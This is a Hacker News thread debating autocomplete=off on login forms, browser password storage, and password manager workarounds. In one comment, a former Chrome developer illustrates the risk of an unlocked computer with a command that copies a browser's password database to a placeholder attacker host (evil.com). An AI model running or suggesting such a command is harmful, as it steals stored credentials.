
The war against autocomplete=off (2013) - tshtf
http://blog.0xbadc0de.be/archives/124
======
talklittle
On Firefox:

1\. Go to about:config

2\. Right-click anywhere, New -> Boolean:

signon.overrideAutocomplete

Value: true

More info:
[https://bugzilla.mozilla.org/show_bug.cgi?id=425145](https://bugzilla.mozilla.org/show_bug.cgi?id=425145)

EDIT: Based on the milestone set on that issue, this setting requires Firefox
29. Another workaround is this bookmarklet:
[https://www.squarefree.com/bookmarklets/forms.html#remember_...](https://www.squarefree.com/bookmarklets/forms.html#remember_password)
referenced from comment
[https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16](https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16)

------
wyager
I've run into the problem of web services not letting me store passwords. The
reality is, if you let my password manager (safari jacks into OS X's keychain
system) keep track of things, I'm going to use the random 12-digit
alphanumeric password my password manager provides me. If you don't, I'm
either going to use my shitty "brain" password or put it in my password
manager anyway and just copy-paste it manually.

Thankfully, safari on both iOS and OS X has a toggle to ignore
autocomplete=off, which I take advantage of liberally.

~~~
rip747
[http://xkcd.com/936](http://xkcd.com/936)

~~~
wyager
A random 12-digit alphanumeric is log((26+26+10)^12)/log(2) = 71.45 bits of
entropy. Plenty for a web form.

------
stcredzero
My biggest problem is with sites that don't let me copy/paste into the
password field. WTF!? Who's the PHB that came up with this policy? _Despite_
this misguided nannying, I still use randomly generated 22 character
alphanumeric passwords, even if I have to open up the window in Keepass and
manually type them in. Most people aren't as paranoid and anal as me, however.
Whoever you are, you're basically encouraging people to use weak passwords.

Ironic, as it seems to be banks that are most often guilty of this.

~~~
lambeosaurus
Equally bad: requiring a user to _never use the same password twice_

 __Come on __, I only forgot my password and want to set it to what I think it
should be! I didn 't get hacked! Just let me live my life in peace!

~~~
aruggirello
Worse yet, there are banks that don't let you use _any of the last 3-5
passwords_. This is really annoying, especially when combined with enforcing a
password change every 3 or 6 months. But there is a solution: just use
whatever password you have chosen, and add a number for the current quarter or
semester. Until they come up with a password strength checker measuring the
similarity between your current and previous passwords (eg. levenshtein()),
you should be ok.

~~~
stcredzero
_Until they come up with a password strength checker measuring the similarity
between your current and previous passwords (eg. levenshtein()), you should be
ok._

These have appeared in Ubuntu.

------
penguindev
> Please note that if you combine this policy and at the same time disable
> copy and paste into the password fields (I look at you, Blizzard!), I hate
> you.

oh man. disabling paste is the worst, because it breaks keypassx. (Apple did
this last I checked!)

turbotax did that as well last year, this year they made it sane again.
Luckily there's a firefox about:config setting you can do to not let websites
hijack / block your clipboard events.

~~~
usea
Another way to bypass these fields where you can't paste a password (many
games are guilty of this atrocity): make an AutoHotkey[1] script for rapidly
typing whatever is in your clipboard.

This line will make ctrl-alt-v type your clipboard:

^+v::SendRaw %clipboard%

[1] [http://www.autohotkey.com/](http://www.autohotkey.com/)

------
kybernetyk
The first thing I install in a new browser is an adblocker. The second thing
an addon that disables autocomplete=off.

Yes I'm lazy. But my laptop is encrypted and goes back to the login screen
after 2 minutes of inactivity. To me autocomplete=off is just annoying and
doesn't add any security.

~~~
taf2
it really helps with forms where you are an admin and can edit other users
information... in these forms when autocomplete is on... and starts populating
your information into the user you're trying to edit... well... things just
get pretty messed up...

------
brianpgordon
I just use this bookmarklet to remove "autocomplete=off" from form elements:

javascript:(function(){var%20c=0;function%20R(w){try{var%20a,df,dfe,i,j,x,y,r=1;df=w.document.forms;for(i=0;x=df[i];++i){dfe=x.elements;if(a=x.onsubmit){a=""}if(a=x.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}for(j=0;y=dfe[j];++j){if(a=y.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}}}}catch(E){r=0}return%20r}R(self);var%20i,x;for(i=0;x=frames[i];++i)R(x);if(c){alert("Found:%20"+c)}})();

~~~
yonran
There’s also the Chrome extension autocomplete=on from a Chromium author:
[https://chrome.google.com/webstore/detail/autocomplete-
on/ec...](https://chrome.google.com/webstore/detail/autocomplete-
on/ecpgkdflcnofdbbkiggklcfmgbnbabhh)

~~~
jonmetz
Shameless plug:

I dot so worked up over this kind of nonsense one day that I wrote a firefox
addon to turn autocomplete on. [https://addons.mozilla.org/En-
us/firefox/addon/autocompletea...](https://addons.mozilla.org/En-
us/firefox/addon/autocompleteanywhere/)

------
choult
This drives some of our customers nuts because autocomplete has the annoying
tendency in the most recent Safari of overwriting prepopulated fields - users
end up losing configurations over this.

Otherwise I can see the benefit of ignoring the setting, perhaps, but we need
consistent default behavior (chance would be a fine thing!). I don't want to
be telling my customers that they should switch off autocomplete as a user
shouldn't need to configure a browser to use a website!

~~~
bdash
Have you filed a bug report about Safari overwriting prepopulated fields? If
not, and you don't want to deal with the painful experience that is
bugreport.apple.com, feel free to drop me an email with more details about
what you're seeing.

~~~
choult
I'll drop you a line on Monday when I can scrabble together something better
than swearing :P

------
205guy
The original article fails to take into account the larger population. The
basic password managers in browsers are huge security holes. The one in FF
does not use a master password by default, so anyone could look at an
unattended computer and see all stored passwords with a few clicks. The
article mentions an old JavaScript attack on the passwords as well (but then
dismisses the threat, since that one hole was patched).

So the problem really is that the browsers pushed insecure features out to the
masses, and many people adopted them. The number of people in the general
population who use a password manager is low (obviously it is high here on
HN). So think of the autocomplete=off flag as a flag to make sure you are
using a competent password manager, one that recognizes the problem and then
overrides the flag. Sounds like Safari and IE 11 are already doing that, so
hopefully they fixed the problems of the early password managers.

~~~
greggman
You might not agree with this but hear me out. I used to work on Chrome and I
was curious what the justification was for storing passwords unencrypted in
Chrome. I went and talked to the Chrome security team and they frustratingly
explained it to me as they get this question all the time.

As you said, in FF, (and in Chrome), a few clicks and anyone could look and an
unattended computer and see all the stored passwords. As they pointed out, an
unlocked unintended computer can pretty much be owned by anyone who wants to
own it. You've given them access to your computer. They can open a shell and
start running apps. They can exploit any bug in the OS or other app. They can
copy files to a USB stick or across the net. On top of that, your password
manager (or FF or Chrome) will let them log into your mail, your bank, your
facebook, whatever services you've saved passwords for even without knowing
your password.

The point is

(1) don't leave your computer unlocked and unattended. Put a password on it,
when you walk away from the computer lock the computer (start the screensaver
or whatever that makes it required you to use a password to get back in)

(2) don't ever let someone use your computer logged in as you. If you hand
someone your computer to use login as guest then hand it to them.

If you're like me you'll probably reject these suggestions. I thought "I don't
want to be bother to lock and unlock my computer all the time" and I thought
"It's stupid to expect me to put my computer in guest mode anytime I let
someone else use it."

But, after I calmed down and thought about it I realized they are right. If
someone wants your passwords or other data and you hand them an unlocked
machine they are going to get them. How FF or Chrome or Password managers
store passwords has nothing to do with that.

~~~
czr80
Let me fix one line in your post: If someone _with sufficient technical
knowledge_ wants your passwords or other data and you hand them an unlocked
machine they are going to get them.

Now, reducing the technical knowledge required from "opening a shell and
running apps" to "click here to see all passwords in seconds" greatly reduces
the technical knowledge required and so greatly increases the risk you're
exposed to.

~~~
greggman
You're right. But, I'm guessing the set of people who know they could see your
password easily is pretty much the same set of people with sufficient
technical knowledge that they either know how to do more or know how to find
out how to do more.

Open terminal type

scp .somebrowser/password.db user@evil.com:

Takes no more time than writing down passwords like nfie28447ncjf;$/$38342.
Probably less if there's more than one password

------
michaelbehan
This article uses "password managers" ambiguously. In my opinion, a browser is
a terrible password manager because of what is stated in the "pros" section of
the article. My advice aligns with others who have replied here - get a real
password manager such as 1password and allow autocomplete="off" to do what it
is supposed to do.

~~~
claudius
Sorry, but which of the two points in the ‘pro’ section (storing truly
sensitive visible information and hacking of client-site databases) makes a
browser less capable of acting as a password manager than a ‘real’ password
manager?

Or maybe you could rephrase why you think browsers are terrible password
managers? I’m quite fond of Opera’s Wand.

~~~
dasil003
I'm going to go out on a limb and suggest just because 1password is really
really good. So good that I don't even want to try a browser's password
manager (especially since I want access to my passwords on multiple browsers
and my phone/tablet as well). I'm sure browser password managers have made
leaps and bounds, but so as 1password and it's amazing.

------
wglb
The issue may be moot--IE 11 ignores autocomplete=off.

And in any case, for the cases where this setting is effective, it doesn't
_break_ password managers--just set your password manager to not fill the
fields, but use copy and paste for the password.

[Edit - spelling]

~~~
zyxley
I think you mean "moot", not "mute".

~~~
wglb
Thanks, fixed.

------
joshuahedlund
> Tell me how I am supposed to fulfill these requirements if I need 20
> websites daily to do my work ?

One solution to this problem (or at least one way to severely mitigate it) is
to use a base word that you tweak with a simple algorithm based on the first
letter, last letter, number of letters in the domain, etc. Of course some
websites have mutually exclusive requirements, so this doesn't work for all
sites, but I've been doing this for so many years now that while I have muscle
memory for frequently used sites, I can go to a site I haven't been to in
years and have no memory of the actual characters in the password, but I apply
my algorithm and voila, it works!

~~~
ToastyMallows
I changed all my passwords recently to do the same thing. The problem I've
recently started to see is that, let's say for example my hashed+salted
password is stolen from a site. If they brute-force figure out what my
password is, they'll have my "base word" and all my other accounts may still
be able to be compromised.

Recently I changed my big accounts (Google, Facebook, StackOverflow) to have a
slightly different "base word" and the other accounts that I can afford to
lose control of have stayed the same.

~~~
smileysteve
It's significantly more difficult to reuse the base and figure out the
additional characters than it is to get access to the user whose password is
'password'

For insecure services that I use on mobile, public, etc computers, I do this.

------
pkulak
[https://chrome.google.com/webstore/detail/autocomplete-
on/ec...](https://chrome.google.com/webstore/detail/autocomplete-
on/ecpgkdflcnofdbbkiggklcfmgbnbabhh)

My favorite extension.

~~~
raldi
Doesn't work on Airbnb, though.

------
freehunter
I don't think I've run into a situation where LastPass has been unable to
auto-fill a form. Is this a feature of LastPass, or have I just not gone to
sites that disallow autocomplete?

~~~
pwman
LastPass has a setting to respect autocomplete -- it's off by default because
so many sites use it inappropriately.

------
yukichan
1password makes this never be an issue for me. ⌘+/ to log into anything with
one stroke, unless I have multiple accounts for the site, in which case it's a
couple of extra clicks.

~~~
wernercd
Same for KeePass (Cntrl + Alt + A). Never had an issue now that I use it
fairly consistently.

Key is I guess not using browser stores.

------
yaur
I'm going to go with Bruce Schneier on this one and say that there is
absolutely nothing wrong with writing your passwords down. If someone mugs me
and takes my wallet there is a 99% chance they are going to get the phone too
and I'll need to change all my passwords anyway.

Not letting the browser cache them is still dumb though.

------
malandrew
Could you not run an analysis of a user's password on account creation or
password reset that determines if it is likely to be autogenerated and managed
by a password manager. Then armed with this flag enable or disable
autocomplete on a user by user basis with javascript?

------
SloopJon
Someone was showing me Capital One 360 (formerly ING), which uses an onscreen
PIN pad that you either have to click with your mouse, or type using a
randomly generated mapping. The idea is to thwart keystroke loggers, but it's
totally infuriating.

~~~
duskwuff
The worst part is, it doesn't even thwart keyloggers very well! It's not
uncommon for password stealing malware to detect when the user is viewing a
site that uses a "PIN pad" login of this type, and start taking screenshots
surrounding the location of each click to capture input.

------
shittyanalogy
How does it break password managers? Does it prevent them from auto-filling in
or auto-saving the password? I use passpack and enter/retrieve my credentials
manually and so don't experience this and appreciate autocomplete=off.

------
Sir_Cmpwn
Only slightly related, but I really wish GitHub would add autocomplete=off on
the language selection dropdown for Gist. If you make your own autocomplete
UI, I would prefer that you disable the browser UI.

------
matt-attack
I use:

[https://addons.mozilla.org/en-US/firefox/addon/remember-
pass...](https://addons.mozilla.org/en-US/firefox/addon/remember-passwords/)

It's heavenly.

------
raldi
Is it me, or is there no way to force Airbnb to allow Chrome to remember my
password, even with an extension?

------
gdulli
I used to use Chrome as my second browser, where I'd keep my work gmail
account up.

Recently it started to no longer save my password, even with an
autocomplete=on plugin installed that works on other sites. That was my
catalyst for uninstalling Chrome altogether and moving to Firefox for
everything.

------
JelteF
ChromeIPass (Keepass autofill for Chrome) just ignores this as far as I know.

------
badman_ting
Right, this isn't what autocomplete=off is for. It's for fields where
correcting the user's input to dictionary words is of negative utility, for
example, typing stock tickers should not correct "aapl" to "apple".

~~~
smackfu
Isn't that the "autocorrect" option?

~~~
badman_ting
Duhh, right you are. I keep conflating the two.

